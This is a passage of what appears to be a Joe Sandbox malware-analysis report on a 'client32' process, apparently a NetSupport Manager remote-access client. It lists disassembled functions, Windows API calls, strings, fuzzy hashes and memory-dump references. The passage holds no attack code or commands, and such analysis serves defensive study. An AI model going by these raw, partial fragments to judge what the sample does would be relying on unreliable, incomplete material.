Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 863766397-389219706
Opcode ID: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
Instruction ID: a1209e8bcef48249843ed2990b636ee265ac836deafb44f4c9fe9e5cc28cb7ac
Opcode Fuzzy Hash: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
Instruction Fuzzy Hash: 18215E75A0061DABDB00DF95DC81FEEF3B8EF48714F104259E925B3280EB746904CBA1

Function 1115F5C2 Relevance: 10.6, APIs: 7, Instructions: 74COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5D7
DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5E4
__realloc_crt.LIBCMT ref: 1115F621
__realloc_crt.LIBCMT ref: 1115F637
EncodePointer.KERNEL32(00000000,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F649
EncodePointer.KERNEL32(11019A91,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F65D
EncodePointer.KERNEL32(-00000004,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F665

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID:
API String ID: 4108716018-0
Opcode ID: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
Instruction ID: 865a5de33b780d49622554ffb0a8386059ac67280241af18dea6a2ab0d8d04ff
Opcode Fuzzy Hash: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
Instruction Fuzzy Hash: EF11E976601227AFD7419FB5CCC085AFBE9EB41268715043BE826D3160FB71ED10CB61

Function 11005620 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 1100565D
BeginPaint.USER32(?,?), ref: 11005668
BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100568A
EndPaint.USER32(?,?), ref: 110056AF

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11005648
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005643

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1216912278-2830328467
Opcode ID: 9254acf7cb2dd027ae479b73be250cafdcbc6af5c4db80bcda7f06daa57de913
Instruction ID: f46a7ba68e69644cdce5168b45270f6634ca8fb58275ab798bc32c13cb6f530c
Opcode Fuzzy Hash: 9254acf7cb2dd027ae479b73be250cafdcbc6af5c4db80bcda7f06daa57de913
Instruction Fuzzy Hash: EE118F75A40219BFE710CBA0CC85FAEF3BCEB88714F108529F61696180EA70A9048765

Function 1100B290 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
EnterCriticalSection.KERNEL32(?), ref: 1100B2F8

Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B

waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
_free.LIBCMT ref: 1100B318
_free.LIBCMT ref: 1100B31E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61

Function 110CB5D0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000475), ref: 110CB5E0
GetWindowTextLengthA.USER32(00000000), ref: 110CB5E7
GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB605
_free.LIBCMT ref: 110CB617

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB630
IsA(), xrefs: 110CB635

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorItemLastText$ExitFreeHeapLengthMessageProcessWindow_freewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 251526942-3415836059
Opcode ID: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
Instruction ID: 0eb6a058222da800fe12992da5caab4c5bd0fe2efc99a90d0edb73e055c5ac9e
Opcode Fuzzy Hash: 99e580d3e1833fc068e3b290c8354ea38fc1aa46638c1302fc5de43aa3fb4a75
Instruction Fuzzy Hash: CA01AD7AA00517BBD740DB99DC88D9FF3ADEF892583148120FA2887200DB34F9158BE2

Function 1101D350 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D35E
LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
RegisterClassExA.USER32(00000030), ref: 1101D3E1
GetLastError.KERNEL32 ref: 1101D3E7

Strings

0, xrefs: 1101D36C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96

Function 11003340 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
GetSubMenu.USER32(00000000,00000000), ref: 11003373
DestroyMenu.USER32(00000000), ref: 110033A2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hMenu, xrefs: 11003363
hSub, xrefs: 11003389
..\CTL32\annotate.cpp, xrefs: 1100335E, 11003384

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA

Function 11003430 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF1), ref: 1100343D
GetSubMenu.USER32(00000000,00000000), ref: 11003463
DestroyMenu.USER32(00000000), ref: 11003492

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hMenu, xrefs: 11003453
hSub, xrefs: 11003479
..\CTL32\annotate.cpp, xrefs: 1100344E, 11003474

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
Instruction ID: 2e6e1d300c4266612bf4869b02bb9134ae399a8ea59526bbeac45393f23ca2b2
Opcode Fuzzy Hash: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
Instruction Fuzzy Hash: 5FF0553EF4026A63C61362263C49F8FB6688BC1AA8F120071FA10BE684FD20B00041FB

Function 11031440 Relevance: 9.2, APIs: 6, Instructions: 156fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 11031494
GetFileSize.KERNEL32(00000000,00000000), ref: 110314B0
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 110314D3
_memmove.LIBCMT ref: 11031527
CloseHandle.KERNEL32(?), ref: 11031563
CloseHandle.KERNEL32(?), ref: 110315C4

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateReadSize_memmove_memset
String ID:
API String ID: 845363514-0
Opcode ID: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
Instruction ID: f3b86de38a560134af6e2d620d743e83d5971917c983db1a0387e640a4d59ee1
Opcode Fuzzy Hash: 6b6e9c007c11d9572d404fd9f833afc8f42ac5761e6d632b59b5e145f15c21bf
Instruction Fuzzy Hash: E9514FB1E01219AFCB50CFA8D985A9EFBF9FF48318F108529E515E7240E731A901CB51

Function 110316A0 Relevance: 9.1, APIs: 6, Instructions: 149windowclipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameA.USER32(?,?,00000080), ref: 1103172B
_memmove.LIBCMT ref: 110317B9
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11031829
TranslateMessage.USER32(?), ref: 11031837
DispatchMessageA.USER32(?), ref: 11031844
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1103185F

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Peek$ClipboardDispatchFormatNameTranslate_memmove
String ID:
API String ID: 1130817274-0
Opcode ID: 7576ffd709fa07716c165fdfc77964d0ed77a62a779ae22b00f69701058f802a
